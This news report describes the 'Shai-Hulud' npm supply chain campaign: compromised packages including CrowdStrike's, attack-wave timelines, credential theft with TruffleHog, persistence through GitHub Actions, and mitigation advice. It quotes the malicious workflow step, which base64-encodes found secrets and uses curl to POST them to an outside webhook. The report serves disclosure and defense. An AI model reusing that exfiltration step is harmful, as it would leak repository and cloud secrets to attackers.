
A sophisticated supply chain attack dubbed "Shai-Hulud" has now compromised over 700 npm packages, including multiple official CrowdStrike packages, as attackers demonstrate unprecedented persistence in targeting the JavaScript ecosystem with credential-stealing malware.
The campaign, which began on September 14, 2025, represents the third major npm compromise in recent months, following the crypto-wallet targeting attack that hit 2 billion weekly downloads in early September and the Nx CLI incident in August 2025. Security researchers report the attack is actively expanding, with new compromised packages discovered daily.
CrowdStrike Packages Directly Targeted
In a particularly concerning development, attackers compromised multiple official CrowdStrike npm packages published by the crowdstrike-publisher account on September 16, marking the first time the cybersecurity giant's development tools have been targeted in a supply chain attack.
Affected CrowdStrike packages include:
- @crowdstrike/foundry-js - JavaScript SDK for CrowdStrike's development platform
- @crowdstrike/logscale-dashboard - Dashboard components for log analysis
- @crowdstrike/falcon-shoelace - UI component library
- @crowdstrike/tailwind-toucan-base - Tailwind CSS framework extensions
"Multiple CrowdStrike npm packages published by the crowdstrike-publisher npm account were compromised," Socket Security confirmed. "This looks like a continuation of the ongoing malicious supply chain campaign."
The targeting of a major cybersecurity company's development tools represents a significant escalation, potentially giving attackers access to systems used by CrowdStrike customers and partners.
Socket's research team identified the initial malicious activity, with JFrog's malware scanners later detecting compromised packages across hundreds of versions. The attack continues to expand, with researchers tracking new compromised packages daily across multiple hash variants of the malware payload.
Coordinated Multi-Day Campaign With Distinct Attack Waves
Technical analysis reveals the Shai-Hulud campaign operates through carefully orchestrated attack waves, with researchers tracking distinct malware variants by their SHA-256 hashes across a three-day assault:
September 14, 2025:
- 17:58 UTC: Initial compromise detected with packages like rxnt-authentication and json-rules-engine-simplified
- 20:29-20:45 UTC: First major burst targeting 25+ packages
- 21:01-21:03 UTC: Secondary wave compromising ~17 packages
September 15, 2025:
- Multiple coordinated bursts throughout the day, with over 100 packages compromised
- Attackers deployed at least 4 distinct malware hash variants, suggesting sophisticated payload management
September 16, 2025:
- 01:14 UTC: Largest single burst targeting nearly 100 packages, including the CrowdStrike compromise
- Continued expansion with additional waves affecting @operato and other package families
"The attack surface is growing and we will continue updating this list," Socket Security warned, indicating the campaign remains active.
Credential Harvesting: The malware bundles TruffleHog, a legitimate open-source secret scanner, to systematically search infected systems for:
- GitHub personal access tokens
- NPM publishing tokens
- AWS access keys and secrets
- Google Cloud Platform credentials
- Azure credentials (in later variants)
System Profiling: The malware gathers comprehensive system information, including platform details, environment variables, and runtime configurations, to optimize its attack strategy.
Data Exfiltration: Stolen credentials are transmitted through multiple channels:
- Direct uploads to hardcoded webhook endpoints
- Creation of private GitHub repositories named "Shai-Hulud" containing base64-encoded stolen data
- Injection of GitHub Actions workflows that persist beyond initial infection
Persistent CI/CD Compromise
Perhaps most concerning is the malware's ability to establish persistent access to development environments. The payload writes malicious GitHub Actions workflows into repositories that continue executing during future CI/CD runs.
"The workflow that it writes to repositories persists beyond the initial host," security researchers warned. "Once committed, any future CI run can trigger the exfiltration step from within the pipeline where sensitive secrets and artifacts are available by design."
The injected workflow contains code that posts all repository secrets to attacker-controlled endpoints:
run: |
  CONTENTS="$(cat findings.json | base64 -w0)"
  curl -s -X POST -d "$CONTENTS" "https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7"
Massive Scope of Compromise
The attack has compromised packages across numerous high-profile organizations:
CrowdStrike packages including:
- @crowdstrike/foundry-js - JavaScript SDK platform
- @crowdstrike/logscale-dashboard - Log analysis dashboard
- @crowdstrike/falcon-shoelace - UI component library
Popular development ecosystems:
- NativeScript packages: @nativescript-community/sqlite, @nativescript-community/ui-material-core
- Angular/React tools: angulartics2, ngx-bootstrap, react-jsonschema-form-extras
- Development utilities: ember-browser-services, eslint-config-crowdstrike
The targeting of CrowdStrike's official packages represents a particularly bold escalation, potentially exposing systems used by the cybersecurity giant's enterprise customers.
Supply Chain Attack Evolution
The Shai-Hulud campaign represents a significant evolution in npm supply chain attacks, building on techniques seen in previous incidents:
- Scale: Over 500 packages compromised versus 40+ in the tinycolor incident
- Persistence: GitHub Actions workflows provide long-term access beyond initial infection
- Sophistication: Integration of legitimate tools like TruffleHog for credential scanning
- Multi-platform targeting: Support for AWS, GCP, Azure, GitHub, and npm ecosystems
"The use of GitHub repositories to store stolen data mirrors techniques seen in the previous NX CLI compromise," JFrog researchers noted, though attribution between campaigns remains uncertain.
Immediate Protection Measures
For Development Teams:
- Audit infected environments: Check CI/CD systems and developer machines that installed affected packages for unauthorized publishes or credential theft
- Rotate all tokens: Immediately rotate npm tokens, GitHub PATs, AWS keys, and other exposed secrets
- Review package locks: Examine package-lock.json changes with the same scrutiny as application code
- Pin dependencies: Use npm's overrides feature to pin vulnerable packages to known-good versions
- Monitor for persistence: Check repositories for unauthorized GitHub Actions workflows, especially those named "shai-hulud-workflow.yml"
For Individual Developers:
- Scan local development environments for signs of compromise
- Review recent GitHub repository activity for unauthorized commits or Actions workflows
- Enable two-factor authentication on all development accounts
- Use npm ci instead of npm install in automated environments
Industry-Wide Implications
The rapid succession of major npm attacks—cryptocurrency theft in September, Shai-Hulud in mid-September, and the earlier Nx compromise—signals a fundamental crisis in open-source supply chain security.
"The open-source ecosystem runs on trust, but it's crucial to be vigilant," security experts warn. "Organizations must now balance the convenience of open-source dependencies with the reality that any package update could potentially introduce malicious code."
The attacks highlight critical vulnerabilities in the npm ecosystem:
- Single points of failure through maintainer account compromise
- Lack of mandatory two-factor authentication
- Insufficient monitoring of package changes
- Weak verification mechanisms for package updates
Ongoing Investigation
Security researchers continue tracking the expanding compromise as new malicious packages are discovered. The attack's use of legitimate tools and sophisticated persistence mechanisms suggests well-resourced attackers with a deep understanding of developer workflows.
NPM has begun removing malicious package versions, though some packages remained compromised at the time of reporting. The full scope of data theft and compromised systems may not be known for weeks as organizations audit their development environments.
The Shai-Hulud campaign serves as a stark reminder that the JavaScript ecosystem's vast dependency network, while enabling rapid development, also creates unprecedented attack surfaces that threat actors are increasingly exploiting at scale.
This is a developing story. Organizations should immediately audit their development environments and rotate credentials if any listed packages were installed in their infrastructure.